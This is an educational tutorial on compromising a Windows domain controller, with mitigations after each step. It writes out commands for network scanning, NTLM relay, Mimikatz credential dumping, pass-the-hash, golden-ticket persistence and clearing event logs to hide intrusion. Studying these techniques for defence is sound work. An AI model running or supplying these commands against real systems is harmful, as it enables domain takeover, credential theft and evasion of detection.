Domain Controller Hacking for Educational Purposes: Step-by-Step Guide

Disclaimer

This article is intended solely for educational purposes. The techniques described here should only be tested in controlled and authorized environments. Unauthorized use of these methods is illegal and unethical. Always follow legal and ethical guidelines when conducting security assessments.

Domain Controller Hacking: From Network Discovery to Full Compromise (Educational Purposes Only)

A Domain Controller (DC) is the core of a Windows Active Directory (AD) environment. It manages user authentication, enforces security policies, and stores sensitive data. Gaining control of a domain controller essentially grants control over the entire network.

In this tutorial, we will explore how attackers compromise domain controllers step by step, using tools like BloodHound, NTLM attacks, Impacket, and Mimikatz. Remember, these techniques are shared purely for educational purposes and should never be performed in unauthorized environments.

Step 1: Network Discovery

Keyword: Network Discovery for Domain Controllers

The first step in domain controller exploitation is network discovery. Attackers need to identify networked systems, especially domain controllers, and enumerate open ports and services.

A commonly used tool for this purpose is Nmap. To scan the network and find live hosts and open ports, run:

nmap -p 135,139,445,3389 -sS -T4 -oA dc-scan 192.168.1.0/24

Interpreting Results:

• Port 135 (RPC): Remote Procedure Call, used for administrative tasks.
• Port 139/445 (SMB): Used for file sharing and domain services.
• Port 3389 (RDP): Remote Desktop Protocol, used for remote administration.

Once domain controllers are identified, use Nmap scripts to gather more information:

nmap -p 445 --script=smb-enum-shares,smb-enum-users 192.168.1.10

Mitigation:

• Restrict SMB and RDP access to trusted IP ranges only.
• Implement firewall rules to minimize exposure.
• Monitor for unusual scanning activities on critical ports.

Step 2: Active Directory Enumeration with BloodHound

Keyword: BloodHound for Active Directory Enumeration

BloodHound is a powerful tool for Active Directory enumeration, mapping out user and group relationships to identify potential attack paths. It uses Neo4j as a database and relies on PowerShell scripts to gather data.

First, download and install BloodHound:

sudo apt install bloodhound

Start the Neo4j database:

sudo neo4j console

Launch BloodHound:

bloodhound

Data Collection:

Use the SharpHound ingestor to collect AD data from a compromised machine:

SharpHound.exe -c All -d domain.local -o All.zip

Upload the collected data to BloodHound and visualize attack paths, focusing on:

• Domain Admins
• High-privilege users
• Vulnerable group memberships

Mitigation:

• Limit permissions and group memberships.
• Regularly audit Active Directory configurations.
• Use Privileged Access Workstations (PAWs) for administrative tasks.

Step 3: NTLM Relay Attacks

Keyword: NTLM Relay Attacks with Impacket

NTLM is vulnerable to relay attacks, where an attacker intercepts authentication requests and relays them to gain unauthorized access.

Use Impacket’s ntlmrelayx to set up a relay server:

impacket-ntlmrelayx -tf targets.txt -smb2support

Launch Responder to capture NTLM hashes:

responder -I eth0

When a victim authenticates to the attacker’s machine, Responder captures the NTLMv2 hash, which can be relayed to another machine to gain access.

Mitigation:

• Enforce SMB signing to prevent NTLM relay attacks.
• Implement LDAP signing and channel binding.
• Disable NTLM where possible and enforce Kerberos.

Step 4: Credential Dumping with Mimikatz

Keyword: Credential Dumping with Mimikatz

Mimikatz is a versatile tool for extracting credentials from Windows memory. It can dump password hashes, Kerberos tickets, and plain-text passwords.

Download Mimikatz and run as Administrator:

mimikatz.exe

Dumping Credentials:

Use the following command to list cached credentials:

privilege::debug
sekurlsa::logonpasswords

To dump Kerberos tickets for offline cracking:

sekurlsa::tickets

Pass-the-Hash Attack:

With extracted hashes, attackers can authenticate without needing plaintext passwords:

pth-winexe -U "DOMAIN/Administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0" //192.168.1.10 cmd.exe

Mitigation:

• Apply LSASS protection to block unauthorized memory access.
• Enable Credential Guard to isolate credential storage.
• Restrict administrative access and monitor logon events.

Step 5: Post-Exploitation and Persistence

Keyword: Maintaining Persistence in Domain Controllers

Once an attacker gains domain admin privileges, maintaining access becomes the priority. A common technique is to create Golden Tickets with Mimikatz:

mimikatz.exe "kerberos::golden /domain:domain.local /sid:S-1-5-21- /rc4:HASH /user:Administrator /id:500"

Persistence Tactics:

• Scheduled Tasks: Automate malicious scripts.
• Backdoor Accounts: Add a hidden domain admin.
• Group Policy Objects (GPO): Deploy malicious policies.

Mitigation:

• Monitor for unusual account creation and policy changes.
• Regularly audit GPO configurations.
• Detect abnormal Kerberos ticket usage with SIEM solutions.

Step 6: Cleanup and Covering Tracks

Keyword: Clearing Logs and Covering Tracks

Attackers often attempt to delete logs to hide their presence. Use wevtutil to clear logs:

wevtutil cl Security
wevtutil cl Application

Advanced attackers may also use log manipulation tools or modify event logs to retain only legitimate entries.

Mitigation:

• Enable Sysmon for advanced logging.
• Forward logs to a centralized server to ensure tamper protection.
• Detect suspicious log clearance activities with automated alerts.

Conclusion

Compromising a domain controller grants attackers full control over an organization's infrastructure, making it a prime target. By understanding the attack chain, cybersecurity professionals can better defend against these threats. Implementing layered security measures, network segmentation, and continuous monitoring can significantly reduce the risk of a successful attack.

Again, this guide is strictly for educational purposes. Always obtain explicit authorization before conducting security assessments, and never use these techniques in unauthorized environments.